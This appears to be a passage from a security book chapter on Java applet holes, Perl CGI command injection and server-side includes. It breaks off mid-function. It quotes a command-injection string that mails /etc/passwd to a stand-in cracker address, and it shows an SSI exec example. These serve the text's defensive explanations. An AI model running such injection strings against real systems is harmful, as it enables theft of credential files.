Certain types of languages and encryption routines are composed of libraries and functions that can be incorporated into other applications. This is a common scenario, well known to anyone who uses C or C++ as a programming language. These libraries consist of files of plain text that contain code that defines particular procedures, constant variables, and other elements that are necessary to perform the desired operation (encryption, for example). To include these libraries and functions within his or her program, the programmer inserts them into the program at compile time. This is generally done with an #include statement, as in

#include <stdio.h>

After these routines have been included into a program, the programmer may call special functions common to that library. For example, if you include the crypt library in your program, you may call crypt() and the other encryption routines common to that library from anywhere within the program. This program is then said to have crypt within it and, therefore, it has cryptographic capabilities.

Java was so much the rage that Netscape Communications Corporation included Java within certain versions of its flagship product, Navigator. That means supported versions of Netscape Navigator were Java enabled and could respond to Java programming calls from within a Java applet. Thus, Java applets could directly affect the behavior of Navigator.

NOTE: The Java runtime environment incorporated into the code of the Netscape Navigator browser (and many other browsers) is standard and totally distinct from the Java runtime engine provided with the Java Development Kit (JDK).

Because Navigator and Internet Explorer are the two most commonly used browsers on the Internet, an entire class of users (on multiple platforms) could potentially be affected by Java security problems. Some of those platforms are

Windows, Windows 95, and Windows NT
Any supported flavor of UNIX
Macintosh

What Was All the Fuss About?

The majority of earth-shaking news about Java security came from a handful of sources. One source was Princeton University's Department of Computer Science. Drew Dean, Edward W. Felten, and Dan S. Wallach were the chief investigators at that location. Felten has been an Assistant Professor of Computer Science at Princeton University since 1993 and was a recipient of the National Young Investigator award (1994). Professor Felten worked closely with Dean and Wallach (both computer science graduate students at Princeton) on finding holes unique to Java.

Holes within the Java system are not the Felten team's only claim to fame, either. You may recall a paper discussed earlier in this book on a technique dubbed Web spoofing. The Felten team (in conjunction with Dirk Balfanz, also a graduate student) authored that paper as well, which details a new method of the man-in-the-middle attack.

In any event, weaknesses within the Java language that were identified by this team include the following:

Denial-of-service attacks could be effected in two ways: first, by locking certain internal elements of the Netscape and HotJava browsers, thereby preventing further host lookups via DNS; second, by forcing CPU and RAM overutilization, thus grinding the browser to a halt. Further, the origin of such an attack could be obscured because the detrimental effects could be delayed by issuing the instructions as a timed job. Therefore, a cruiser could theoretically land on the offending page at noon, but the effect would not surface until hours later.
DNS attacks could be initiated where the browser's proxies would be knocked out, and the system's DNS server could be arbitrarily assigned by a malicious Java applet. This means that the victim's DNS queries could be re-routed to a cracked DNS server, which would provide misinformation on hostnames. This could be a very serious problem that could ultimately result in a root compromise (if the operator of the victim machine were foolish enough to browse the Web as root).
At least one (and perhaps more) version of Java-enabled browsers could write to a Windows 95 file system. In almost all versions, environment variables were easily culled from a Java applet, Java applets could snoop data that many feel is private, and information could be gathered about where the target had been.
Finally, Java suffered from several buffer overflow problems.

Public reaction to the findings of the Felten team was not good. This was especially so because the researchers wrote that they had advised Sun and Netscape of the problems. The two giants responded with a fix, but alas, many of the original problems remained, opened by other avenues of attack.

Cross Reference: The Felten team's paper, titled "Java Security: From HotJava to Netscape and Beyond," can be found on the Web at http://www.cs.princeton.edu/sip/pub/secure96.html.

JavaSoft (the authoritative online source for Java developments) responded to these reports promptly, although that response did not necessarily indicate a solution. In one online advisory, the folks at JavaSoft acknowledged that hostile Java applets had been written (they even gave a few links) and suggested that work was underway to correct the problems. However, the advice on what to do if such applets are encountered offered users very little sense of security. For example, for a Java applet that entirely blew away your browser, the advice was this:

...one way to recover from this applet is to kill the browser running on your computer. On a UNIX system, one way to accomplish this is to remotely log into your computer from another computer on your local network, use ps to find the process ID that matches the hijacked browser's process ID, and issue a kill -9 PID.

Cross Reference: JavaSoft's advisory can be found at http://java.javasoft.com/sfaq/denialOfService.html.

Killing your browser is hardly a method of recovering from an attack. For all purposes, such a denial-of-service attack has effectively incapacitated your application.

It was determined that users running Java-enabled browsers were posing risks to those networks protected by firewalls. That is, Java would flow directly through the firewall; if the applet was malicious, firewall security could be breached then and there. Crackers now have lively discussions on the Internet about breaking a firewall in this manner. And, because Java shares so many attributes with C++ (which may be thought of as a superset of C), the programming knowledge required to do so is not foreign terrain to most talented crackers.

Many proponents of Java loudly proclaimed that such an attack was impossible, a matter of conjecture, and knee-jerk, alarmist discussion at best. Those forces were silenced, however, with the posting of a paper titled "Blocking Java Applets at the Firewall." The authors of this paper demonstrated a method through which a Java applet could cajole a firewall into arbitrarily opening otherwise restricted ports to the applet's host. In other words, an applet so designed could totally circumvent the basic purpose (and functionality) of the firewall, full stop. Thus, in addition to other weaknesses that Java had already introduced, it was also found to be an ice pick with which to stab through a firewall.

Cross Reference: "Blocking Java Applets at the Firewall," by David M. Martin Jr., Sivaramakrishnan Rajagopalan, and Aviel D. Rubin, can be found on the Web at http://www.cs.bu.edu/techreports/96-026-java-firewalls.ps.Z.

In fairness, Sun and JavaSoft have fixed many of these problems with this new language, but some remain. Further, many individuals are still using older versions of the Java runtime and development kits, as well as older versions of Java-enabled browsers.

Cross Reference: To get a closer view of JavaSoft and Sun's fixes (by version number), check out http://www.javasoft.com:80/sfaq/index.html.

For the average user, hostile Java applets (at least, those produced thus far by the academic community) can produce no more than minor inconveniences, requiring reboot of the browser or the machine. However, for those who work in information security, Java has an entirely different face. Any unwanted element that can slip through a firewall is indeed a threat to security. If you are a system administrator of an internal network that provides partial or full access to the Internet, I advise you to forbid (at least for the moment) the use of browsers that are Java enabled or enforce a policy that users disable Java access.

The Java controversy teaches us this: The Internet is not secure. Moreover, programming languages and techniques deemed secure today are almost invariably found to be insecure tomorrow. In a recent New Riders book on Internet security (Internet Security: Professional Reference), the authors discuss the wonderful features of Java security (there is even a section titled "Java is Secure"). I am certain that at the time the book was written, the authors had no idea about the security flaws of Java. So carefully consider this point: Any new technology on the Internet should be viewed with suspicion. It is wise to remember that even today, holes are occasionally found in Sendmail, many years after its introduction to the network.

Perhaps the most threatening element of Java is this: We have not yet seen the cracking community work with it. Traditionally, cracking is done using garden-variety tools that have been around for years, including C and Perl. However, it is clear that Java could be used in information warfare as a tool to disable machines or otherwise disrupt service.

Cross Reference: For an interesting viewpoint on the use of Java in information warfare, check out Mark D. LaDue's article, "Java Insecurity," scheduled to appear in the Spring 1997 issue of the Computer Security Institute's Computer Security Journal. The article can be found on the Web at http://www.math.gatech.edu/~mladue/Java_insecurity.html.

I should point out here that there have been no recorded instances of Java security breaches in the wild. All the attack schemes developed and tested have been cultivated in either academic or corporate research environments. Furthermore, for the average user, Java security is not a critical issue. Rather, it is within the purview of system administrators and information-security experts that this information is most critical. Actual dangers to the PC computing communities are discussed later in this chapter when I treat Microsoft's ActiveX technology at length.

To learn more about Java security, there are a number of papers you must acquire. Many of these papers are written by programmers for programmers, so much of the material may seem quite technical. Nevertheless, the average user can still gain much important information from them.

Java Security: Weaknesses and Solutions. Jean-Paul Billon, Consultant VIP DYADE. This document is significant because it is one of the latest treatments of the Java security problem. Updates on this document extend into December 1996. This is an invaluable resource for programmers as well as the general public. The information contained within this document addresses weaknesses within the runtime system as well as the language itself. More importantly, the document gives two practical examples and proposes some possible solutions. Excellent.

http://www.dyade.fr/actions/VIP/JS_pap2.html

Low Level Security in Java. Frank Yellin. This paper is one of the first papers to address Java security. It is an important paper, particularly for programmers and system administrators, because it describes the basic characteristics of the Java language and the security considerations behind it.

http://www.javasoft.com/sfaq/verifier.html.

Java Security. Joseph A. Bank (MIT). This paper is a must-read for anyone who wants to learn about Java security. It is a well-written and often easily read analysis of Java and its security features. Most importantly, the paper takes the reader through stages, making it easier for the newcomer to programming to understand the features of Java.

http://www.swiss.ai.mit.edu/~jbank/javapaper/javapaper.html

So, you're wondering exactly what Java can do to your machine. First, for some time, people insisted that Java could not in any way access information located on the hard drive of your computer. Security features within the Java language generally forbid this from happening. However, one independent researcher, Jim Buzbee, was able to develop an applet that did access such information. On his Web page (where you can demo the applet), Buzbee explains:

In most Java implementations, security policy forbids applets from reading the local directory structure. I have discovered that it is possible for an applet, using only Java, to determine if specified files exist on the file system of the client machine. The applet I have prototyped cannot read or write to the file, but it can detect its presence. My applet is then free to surreptitiously e-mail the result of the file search to any machine on the Internet, for example MarketResearch@microsoft.com.

Cross Reference: Buzbee's Web page is at http://www.nyx.net/~jbuzbee/hole.html.

Buzbee's applet is truly extraordinary. It accesses your hard drive and looks for some commonly known (and jealously protected) files. One is the /etc/passwd file. Another is MSOffice (a directory on machines using Microsoft Office). For some reason, the applet moves quite slowly. However, it is capable of identifying which files exist on the drive.

Cross Reference: If you want to check out the applet for yourself (it does no harm and will not lock your browser), you can access it at http://www.nyx.net/~jbuzbee/filehole.html.

The ultimate page for hostile applets is Mark LaDue's. It sports a list of hostile Java applets and their source code. Some of the more amusing ones include

NoisyBear.java--Displays a bear that runs an audio clip. The bear cannot be deleted without killing and rebooting the browser.
AttackThread.java--Displays large black windows that the user cannot grab or otherwise dispose of. This applet requires that you restart the system or the machine. Nasty.
Forger.java--Forges an e-mail message from the victim to a pre-specified target. Very interesting implementation that proves at least that applications can be actively attacked and manipulated.

Cross Reference: There are over a dozen more applets at LaDue's page. Check them out at http://www.math.gatech.edu/~mladue/SourceCode.html.

I have written mainly about the bad aspects of Java. That is largely because this book examines weaknesses. Now, I would like to write a few words about Java's good points.

If you have ever engaged in the development of WWW sites, you know how difficult it is. In today's environment, the WWW site has to be crisp, clean, and engaging. The days of the solid gray background and unjustified text are over. Now, consumers expect something entertaining. Moreover, functionality is expected to exceed simple quote generators and auto-response mail. Perl is largely responsible for many of the menial tasks involved in data processing on the Web, but Java is by far the most powerful application for developing multimedia Web pages. This, coupled with high-end tools such as Fusion by NetObjects and FrontPage by Microsoft, can place you at the very edge of Web design.

Java Books, Articles, Papers, and Other Resources

Java Security: Hostile Applets, Holes, & Antidotes. Gary McGraw and Ed Felten. John Wiley & Sons. ISBN: 0-471-17842-X. 1996.

Java Security. Gary McGraw and Edward Felten. SIGS. ISBN: 1-884842-72-0. 1996.

Java Developer's Guide. Jamie Jaworski and Cary Jardin. Sams.net. ISBN: 1-57521-069-X. 1996.

Java Developer's Reference. Mike Cohn, Michael Morrison, Bryan Morgan, Michael T. Nygard, Dan Joshi, and Tom Trinko. Sams.net. ISBN: 1-57521-129-7. 1996.

Developing Intranet Applications with Java. Jerry Ablan, William Robert Stanek, Rogers Cadenhead, and Tim Evans. Sams.net. ISBN: 1-57521-166-1. 1996.

The Java Handbook. Patrick Naughton. Osborne/McGraw-Hill. ISBN: 0-07-882199-1. 1996.

Just Java, 2nd Edition. Peter van der Linden. Sunsoft Press/Prentice Hall. ISBN: 0-13-272303-4. 1996.

Java in a Nutshell: A Desktop Quick Reference for Java Programmers. David Flanagan. O'Reilly & Associates, Inc. ISBN: 1-56592-183-6. 1996.

The Java Language Specification. James Gosling, Bill Joy, and Guy Steele. Addison-Wesley. ISBN: 0-201-63451-1. 1996.

"Java as an Intermediate Language." Technical Report, School of Computer Science, Carnegie-Mellon University, Number CMU-CS-96-161, August 1996.

http://www.cs.cmu.edu/afs/cs.cmu.edu/project/scandal/public/papers/CMU-CS-96-161.ps.Z

"Java & HotJava: Waking Up the Web." Sean González. PC Magazine. October 1995.

http://www.zdnet.com/~pcmag/issues/1418/pcm00085.htm

"Java: The Inside Story." Michael O'Connell. Sunworld Online. Vol. 07. July 1995.

http://www.sun.com/sunworldonline/swol-07-1995/swol-07-java.html

"Briki: A Flexible Java Compiler." Michael Cierniak and Wei Li. TR 621, URCSD, May 1996.

ftp://ftp.cs.rochester.edu/pub/papers/systems/96.tr621.Briki_a_flexible_java_compiler.ps.gz

"NetProf: Network-Based High-Level Profiling of Java Bytecode." Srinivasan Parthasarathy, Michael Cierniak, and Wei Li. TR 622, URCSD, May 1996.

ftp://ftp.cs.rochester.edu/pub/papers/systems/96.tr622.NetProf_network-based_high-level_profiling_of_java_bytecode.ps.gz

MIME Encapsulation of Aggregate Applet Objects (mapplet). A. Bahreman, J. Galvin, and R. Narayanaswamy.

http://src.doc.ic.ac.uk/computing/internet/internet-drafts/draft-bahreman-mapplet-spec-00.txt.Z

"H-38: Internet Explorer 3.x Vulnerability." (CIAC Advisory) March 4, 1997.

http://ciac.llnl.gov/ciac/bulletins/h-38a.shtml

Internet Java & ActiveX Advisor. Journal.

http://www.advisor.com/ia.htm

Java Developer's Journal.

http://www.javadevelopersjournal.com/java/

Java Report. Journal.

http://www.sigs.com/jro/

Javaworld. Journal.

http://www.javaworld.com/

Gamelan. The ultimate Java archive.

http://www-a.gamelan.com/index.shtml

Perl

Occasionally, just occasionally, a product emerges from the Internet that is truly magnificent. Perl is one such product. What started as a small project for Larry Wall (Perl's creator) turned into what is likely the most fluid, most easily implemented language ever created.

Imagine a programming language that combines some of the very best attributes of languages such as C, sed, awk, and BASIC. Also, remember that Perl programs are a fraction of the size of compiled C programs. Finally, Perl is almost too good to be true for creating CGI applications for use on the WWW. Manipulation of text in Perl is, I think, unrivaled by any computer language.

Perl is heavily relied on as a tool for implementing CGI. Like most programming tools, Perl does not contain many inherent flaws. However, in inexperienced hands, Perl can open a few security holes of its own.

Perl and CGI

CGI is a relatively new phenomenon. It is of significant interest because it offers an opportunity for all programmers to migrate to Web programming. Essentially, CGI can be done on any platform using nearly any language. The purpose of CGI is to allow dynamically built documents and processes to exist on the World Wide Web.

Dynamic here means that the result will vary depending on user input. The result--usually a newly formed Web page--is generated during the CGI process. The easiest way for you to understand this is to examine a Perl script in action. Imagine a Web page with a single form, like the one in Figure 30.4.

FIGURE 30.4.
The SAMS CGI sample page.

The page in Figure 30.4 has a single input field named editbox, which you can see within the following HTML source code:

<HTML>
<HEAD>
<TITLE>SAMS CGI Example</TITLE>
</HEAD>
<BODY bgcolor = "#ffffff">
<P ></P>
<P >The Anatomy of a CGI Program</P>
<P ></P>
<P ></P>
<FORM  ACTION = "getit.cgi" METHOD = "Get" >
<P ><INPUT TYPE = TEXT NAME = "editbox" SIZE = 20 MAXLENGTH = 20></P>
</FORM>
</BODY>
</HTML>

Within that code, the form that holds editbox also points to a script program on the hard drive. That script, called getit.cgi, is named in the ACTION attribute of the FORM tag:

<FORM  ACTION = "getit.cgi" METHOD = "Get" >

So editbox refers to the input box on the form; you assign this name to the box so that later, when you need to, you can refer to the box (and its contents) as a variable. You know from the preceding code that the contents of editbox will be sent to a Perl script called getit.cgi.

getit.cgi is a very simple Perl script. Its function is to take the input in editbox, decode the plus signs and %-escapes that the browser applies to form data, and print the input of editbox on a clean page. The code is as follows:

# Print out a content-type for HTTP/1.0 compatibility
print "Content-type: text/html\n\n";

# Get the input from the test HTML form. The form uses METHOD = "Get",
# so the data arrives in QUERY_STRING; POST data arrives on STDIN.
if ($ENV{'REQUEST_METHOD'} eq 'POST') {
    read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
} else {
    $buffer = $ENV{'QUERY_STRING'};
}

# Split the name-value pairs
@pairs = split(/&/, $buffer);

foreach $pair (@pairs)
{
    ($name, $value) = split(/=/, $pair);

    # Un-Webify plus signs and %-encoding
    $value =~ tr/+/ /;
    $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

    $FORM{$name} = $value;
}

print "$FORM{'editbox'}\n";
print "<html>$FORM{'editbox'}\n</html>";

Of these lines of code, we are concerned only with the last line. What this line means is "Print an entirely new Web page in HTML, and on that page, print the exact same word or words that the user entered into editbox." In this manner, variables are extracted from an HTML page and run through a Perl script. Naturally, after the variables are extracted, they may be worked over by the programmer in whatever manner he or she chooses. For example, if the variables consist of numbers, the programmer could use Perl to, say, add, multiply, or divide those numbers. After the variables have been extracted, the programmer can do almost anything with them. The resulting page will be different depending on what the user enters into editbox. If the user enters the name George, the resulting page prints George. If the user enters the string CGI Security, the resulting page prints CGI Security. (You get the idea.)
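The decoding step is easier to follow when it is isolated from the Web server. The following is a minimal sketch, assuming the form data has already been collected into a string; the subroutine name parse_form_data and the sample string are illustrative and are not part of getit.cgi.

```perl
use strict;
use warnings;

# Hypothetical helper: turn "name=value&name=value" form data into a hash,
# using the same decoding steps as getit.cgi.
sub parse_form_data {
    my ($buffer) = @_;
    my %form;
    foreach my $pair (split /&/, $buffer) {
        my ($name, $value) = split /=/, $pair, 2;
        $value = '' unless defined $value;

        # Un-Webify plus signs and %-encoding
        $value =~ tr/+/ /;
        $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

        $form{$name} = $value;
    }
    return %form;
}

# What a browser would send if the user typed "CGI Security!" into editbox
my %form = parse_form_data('editbox=CGI+Security%21');
print "$form{'editbox'}\n";    # prints: CGI Security!
```

Note that the decoded value is exactly what the user typed, metacharacters and all. Nothing in this step makes the input safe.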

During that process, something very important occurs. After the user enters text into editbox and presses Enter, the text is sent to getit.cgi. getit.cgi calls the Perl interpreter on the server's hard drive. The Perl interpreter evaluates getit.cgi and then automatically executes it.

Here is where CGI security (or insecurity) begins. When a form is processed in this manner, the Perl interpreter is running. There is no human intervention in this process. If the Perl script (in this case, getit.cgi) is written without thought of security, strange and terrible things may happen. There are certain pitfalls of CGI programming; these pitfalls can open up the entire power and scope of the Perl language (or shell) to the visiting cracker.

The System Call

System calls are one common source of break-ins. A system call is any operation in Perl (or any language) that calls another program to do some work. This other program is most often a commonly used command that is part of the operating system or shell.

System calls are generally invoked through the use of the function system(). C programmers who work with the Microsoft platform (whom I am especially targeting here) will recognize this call because in order to use these calls, they may have to include the dos.h (and perhaps even the process.h) file in their compiled program. For those programmers migrating from a Microsoft platform (who may be new to Perl), this point is very important: In Perl, a system call does not require includes or requires. It can be done simply by issuing the call. If the call is issued and no prior check has been made on user input, security issues arise. Issuing a system call in Perl works like this:

system("grep $user_input /home/programmer/my_database");

NOTE: This system call prompts grep to search the file my_database for any matches of the user's input string $user_input. Programs that work like this are cheap ways of avoiding purchasing a proprietary CGI-to-database license. Thousands of sites use this method to search flat-file database files or even directories.

System calls of this nature are dangerous because one can never anticipate what the user will enter. True, the majority of users will input some string that is appropriate (or if not appropriate, one that they think is appropriate). However, crackers work differently. To a cracker, the main issue is whether your CGI has been written cleanly. To determine whether it has, the cracker will input a series of strings designed to test your CGI security technique.

Suppose you actually had the preceding system call in your CGI program. Suppose further that you provided no mechanism to examine the character strings received from STDIN. In this situation, the cracker could easily pass commands to the shell by adding certain metacharacters to his or her string.

Almost all shell environments (MS-DOS's command.com included) and most languages provide for execution of sequential commands. In most environments, this is accomplished by placing commands one after another, separated by a metacharacter. A metacharacter might be a pipe symbol (|) or semicolon (;). In addition, many environments allow conditional command execution by placing commands one after another, separated by special metacharacters. (An example is where execution hinges on the success or failure of the preceding command. This style works along the lines of "If command number one fails, execute command number two" or even "If command number one is successful, forget command number two.")

If your CGI is written poorly (for example, you fail to include a mechanism to examine each submitted string), a cracker can push additional commands onto the argument list. For example, the classic string cited is this:

user_string;mail bozo@cracking.com </etc/passwd

In this example, the /etc/passwd file is mailed to the cracker. This works because the semi-colon signals the interpreter that another command is to be executed after the grep search is over. It is the equivalent of the programmer issuing the same command. Thus, what really happens is this:

system('grep user_string;mail bozo@cracking.com </etc/passwd /home/programmer/my_database');
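To see why the semicolon matters, it can help to build the command string without running it. The following is a minimal sketch that only prints what the shell would receive; the variable names are illustrative, and nothing here is executed as a command.

```perl
use strict;
use warnings;

# The cracker's input, taken from the example above (single quotes keep
# Perl from treating @cracking as an array)
my $user_input = 'user_string;mail bozo@cracking.com </etc/passwd';

# The same interpolation that the vulnerable system() call performs
my $command = "grep $user_input /home/programmer/my_database";
print "$command\n";

# The shell treats the semicolon as a command separator
my @commands = split /;/, $command;
print scalar(@commands), " commands\n";    # prints: 2 commands
```

The first print shows a single string, but the shell reads it as two commands: the grep the programmer intended, and a mail command the programmer never wrote.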

You should think very carefully about constructing a command line using user input, and avoid doing so if possible. There are many ways around this. One is to provide check boxes, radio lists, or other read-only clickable items. Presenting the user with choices in this manner greatly enhances your control over what gets read into STDIN. If possible, avoid system calls altogether.

System call problems are not new, nor are they difficult to remedy. The solution is to check the user's input prior to passing it to a function. There are several actions you can undertake:

In checking for illegal characters, forbid acceptance of user input that contains metacharacters. This is most commonly done by issuing a set of rules that allow only words, as in $user_input =~ s/[^\w ]//g, which deletes every character that is not a word character or a space.
Use taintperl, which forbids the passing of tainted variables (those derived from user input) to commands invoked using the system() or exec() calls. taintperl can be invoked in Perl 4 by calling /usr/local/bin/taintperl and in Perl 5 by using the -T option when invoking Perl (as in #!/usr/local/bin/perl -T).
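Both precautions can be combined in a few lines. The following is a minimal sketch, not a complete defense: the subroutine names clean_input and grep_args and the 20-character limit (borrowed from the form's MAXLENGTH) are assumptions made for illustration. It rejects bad input outright rather than stripping characters, and it prepares arguments for the list form of system(), which runs the program directly instead of handing one string to the shell.

```perl
use strict;
use warnings;

# Hypothetical helper: return the input only if it is 1 to 20 word
# characters or spaces; otherwise return nothing. Under -T, returning
# the regex capture ($1) is also what untaints the value.
sub clean_input {
    my ($raw) = @_;
    return unless defined $raw;
    return $1 if $raw =~ /\A([\w ]{1,20})\z/;
    return;
}

# Hypothetical helper: build the argument list for system() in list form,
# so that no shell ever parses the user's string.
sub grep_args {
    my ($pattern, $database) = @_;
    return ('grep', $pattern, $database);
}

for my $raw ('George', 'user_string;mail bozo@cracking.com </etc/passwd') {
    my $clean = clean_input($raw);
    if (defined $clean) {
        print "accepted: $clean\n";
    } else {
        print "rejected\n";
    }
}

# In a real script, using the chapter's example path:
#   system(grep_args($clean, '/home/programmer/my_database'));
```

Run as written, this accepts George and rejects the classic attack string. Rejecting is the more conservative choice; silently deleting characters can turn a hostile string into a different string that still gets processed.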

Perl also has some built-in security features in this regard. For example, as this excerpt from the Perl man pages notes, the following is what happens when treating setuid Perl scripts (those that require special privileges to run):

When Perl is executing a setuid script, it takes special precautions to prevent you from falling into any obvious traps. (In some ways, a Perl script is more secure than the corresponding C program.) Any command line argument, environment variable, or input is marked as "tainted", and may not be used, directly or indirectly, in any command that invokes a subshell, or in any command that modifies files, directories, or processes. Any variable that is set within an expression that has previously referenced a tainted value also becomes tainted (even if it is logically impossible for the tainted value to influence the variable).

However, you should never, ever run a script in a privileged mode; I am not the only person who will tell you this. "The World Wide Web Security FAQ," an excellent document by Lincoln D. Stein about safe CGI programming, advises as follows:

First of all, do you really need to run your Perl script as suid? This represents a major risk insofar as giving your script more privileges than the "nobody" user has also increases the potential for damage that a subverted script can cause. If you're thinking of giving your script root privileges, think it over extremely carefully.

Cross Reference: "The World Wide Web Security FAQ," by Lincoln D. Stein, can be found on the Web at http://www-genome.wi.mit.edu/WWW/faqs/wwwsf5.html.

The system call problem is not restricted to Perl, but can occur in any language, including C. One very talented programmer and author, Eugene Eric Kim, has this to say about the issue in "Programming CGI in C":

In CGI C programs, C functions that fork a Bourne shell process (system() or popen(), for example) present a serious potential security hole. If you allow user input into any of these functions without first "escaping" the input (adding a backslash before offending characters), someone can maliciously take advantage of your system using special, shell-reserved "metacharacters."

Cross Reference: "Programming CGI in C" by Eugene Eric Kim, can be found on the Web at http://www.eekim.com/pubs/cgiinc/index.html.
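The same hazard exists in any language that can hand a string to a shell. Here is a hedged sketch in Python (not Kim's C code, and not his backslash-escaping method): the first function sidesteps the problem by never invoking a shell at all, and the second quotes the input for those rare cases where a shell command line cannot be avoided. The function names are hypothetical, and sys.executable merely stands in for whatever helper program a real CGI would call.

```python
import shlex
import subprocess
import sys


def run_without_shell(user_text):
    """Pass user input as a single argv element; no shell ever parses it."""
    # The child simply echoes its first argument back. It stands in for
    # a real helper program (an assumption made for this example).
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", user_text],
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout.rstrip("\n")


def quote_for_shell(user_text):
    """Quote input so a POSIX shell treats it as one literal word."""
    return shlex.quote(user_text)
```

With the first approach, input such as hello; echo pwned reaches the child program as plain text, semicolon and all, because no shell is present to interpret the metacharacter.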

I highly recommend Kim's last book, CGI Developer's Guide (published by Sams.net). Chapter 9 of that book ("CGI Security: Writing Secure CGI Programs") provides an excellent overview of CGI security methods. In particular, it addresses some scenarios you will likely encounter in real-life CGI programming, including but not limited to the following:

Buffer overflows
Shell metacharacters
Shell abuses

A Few Words About File Creation

It is unlikely that you will create a CGI process that creates a file. But if you do, some strict rules should be observed:

Restrict the directory in which the file is created. This directory should be divorced from any system-related directory, in a place where such files are easily identified, managed, and destroyed (in other words, never, ever write to a directory like /tmp).
Set the permissions on such files as restrictively as possible. If the file is a dump of user input, such as a visitor list, the file should be readable only by you or the processes that will engage that file. (For example, restrict processes to appending information to the file.)
Ensure that the file's name does not have any metacharacters within it. Moreover, if the file is generated on the fly, include a screening process to weed out such characters.
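These three rules can be sketched in a few lines. The following Python is only an illustration under stated assumptions: append_record and SAFE_NAME are hypothetical names, the whitelist is my own choice, and data_dir is assumed to be a dedicated directory that you have already created well away from system directories.

```python
import os
import re

# Hypothetical whitelist for file names: no slashes, no shell
# metacharacters, and no leading dot (which also rules out "." and "..").
SAFE_NAME = re.compile(r"[A-Za-z0-9_-][A-Za-z0-9._-]{0,63}")


def append_record(data_dir, name, line):
    """Append one line to data_dir/name, creating the file owner-only."""
    if SAFE_NAME.fullmatch(name) is None:
        raise ValueError("unsafe file name: %r" % (name,))
    path = os.path.join(data_dir, name)
    # Append-only, never truncate; refuse to follow a symbolic link
    # on platforms that offer O_NOFOLLOW.
    flags = os.O_WRONLY | os.O_APPEND | os.O_CREAT
    flags |= getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    try:
        # Flatten embedded line breaks so one call writes one record.
        record = line.replace("\r", " ").replace("\n", " ") + "\n"
        os.write(fd, record.encode("utf-8"))
    finally:
        os.close(fd)
    return path
```

The mode 0o600 makes a newly created file readable and writable by its owner alone on UNIX; on other platforms the permission bits may be only partly honored.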

Server-Side Includes

I am against server-side includes. Oh, they are cool and can provide interesting information, but they are, in my opinion, a serious security hazard. Before I discuss the hazards, however, I should define what server-side includes are. Server-side includes are a mechanism by which you can automatically include or incorporate documents or other elements of a Web page into the present Web page by calling these elements from the local (or remote) hard disk drive.

Let me elaborate. Server-side includes (SSIs) are advanced HTML building at work. SSIs function a lot like standard include files in C or C++. By calling these files within your HTML, you can include elements into pages rather than including them by hand. In other words, suppose you wanted every page on your server to have the same header. You could edit your pages so that a standard block of code appeared in each one, or you might call an SSI. My advice: Don't do it.

Here is an example. Suppose you wanted a banner (composed of a graphics file) to appear on a page. You could call it like this:

<!--#include file="mybanner.html"-->

The contents of the file mybanner.html might look something like this:

<br><img src="banner.gif">

In reality, you wouldn't bother using an SSI for this because mybanner.html is even less complex than the SSI call that includes it. But, what if your mybanner.html looked like this:

<TR VALIGN="top" ALIGN="left">
<TD COLSPAN=2 ROWSPAN=5 WIDTH=96 ALIGN="center" VALIGN="center">
<IMG HEIGHT=96 WIDTH=96 SRC="3ad06301.gif"
BORDER=0  ALT="Picture" ></TD>
   <TD COLSPAN=9 HEIGHT=7></TD>
   </TR>
   <TR VALIGN="top" ALIGN="left">
     <!-- These 2 columns occupied by an object -->
     <TD COLSPAN=5></TD>
     <TD COLSPAN=2 ROWSPAN=1 WIDTH=181>
<!-- Start of Text object -->
<P><B><FONT SIZE="-1" FACE="Verdana">SAMS Security InfoBase</B></FONT></TD>
<!-- End Text -->

In such an instance, you might be inclined to use an SSI. Again, I say don't do it. Here is why: SSI can also be used to execute commands. These could be system commands,

<!--#exec cmd="date"--> (Get the date)

or they could be shell scripts. One good way to completely destroy your system in a hurry is to run the httpd server as root and allow SSIs. This effectively gives a cracker the option of deleting all your files, stealing your password files, and so forth. Take a look at Figure 30.5 to see how normal CGI works.

FIGURE 30.5.
The normal CGI process.

Under normal circumstances, the user's input is submitted to an HTML input form. From there, the request is passed to the server and then directly to some CGI program (usually a Perl program) that immediately processes the data. Here, you have only to worry about whether your CGI is secure. Now examine Figure 30.6.

FIGURE 30.6.
CGI process preceded by SSI.

When SSI is active, the process is different. The client's input is forwarded to and parsed by the server. Part of that parsing process is to identify SSI directives. If exec directives exist (those that call other processes), they are executed.
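If you must run with SSI enabled, one precaution is to make sure that nothing a visitor submits can ever reach a parsed page in raw form. The following Python is a rough sketch of that idea, not a complete defense: find_ssi_directives and neutralize are hypothetical names, and the pattern is deliberately looser than any particular server's parser.

```python
import html
import re

# Matches the opening of an SSI-style directive such as <!--#exec ...-->.
# Optional whitespace is tolerated so that near-misses are caught too.
SSI_DIRECTIVE = re.compile(r"<!--\s*#\s*(\w+)", re.IGNORECASE)


def find_ssi_directives(text):
    """Return the lowercased names of SSI-style directives found in text."""
    return [match.group(1).lower() for match in SSI_DIRECTIVE.finditer(text)]


def neutralize(text):
    """HTML-escape text so an embedded directive is displayed, not parsed."""
    return html.escape(text, quote=True)
```

A guest-book script, for instance, could log any submission for which find_ssi_directives() returns a non-empty list and store only the output of neutralize().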

Essentially, SSI is probably not worth the risk. I know what you are thinking: You want to use SSIs because the information within the include files changes dynamically. For example, perhaps you are manipulating banners that are custom made depending on when a user visits. Perhaps these banners are updated based on state information on the user, such as browser type, frame preferences, and so on. Perhaps cookies are not enough for this purpose, and you want your pages to look beautiful and intelligent in their ability to remember the user's vital data. My answer: There are other ways to do it.

One way is to run internal scripts that update this information. Using a combination of Perl and at or cron (two utilities that can time jobs), you can fashion prefab headers and footers that change as information elsewhere changes. Another way to do it is to write a program (perhaps in awk or Perl) that can perform this activity on demand, interactively. This way, you can manage the header/footer combination at certain times of the day and do so interactively to watch for unexpected problems.
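As a sketch of the first approach, the following Python expands include directives ahead of time, so that the pages the server hands out contain no directives at all. I use Python here rather than Perl or awk purely for illustration. The names expand_includes and build_site and the three-directory layout are assumptions; only the include file form of the directive is handled, and a cron or at job (not shown) would run the script on whatever schedule suits you.

```python
import re
from pathlib import Path

# Only plain file names are accepted: no slashes and no leading dot.
INCLUDE = re.compile(
    r'<!--#include file="([A-Za-z0-9_-][A-Za-z0-9._-]*)"\s*-->'
)


def expand_includes(page_text, include_dir):
    """Replace each include directive with the named file's contents."""
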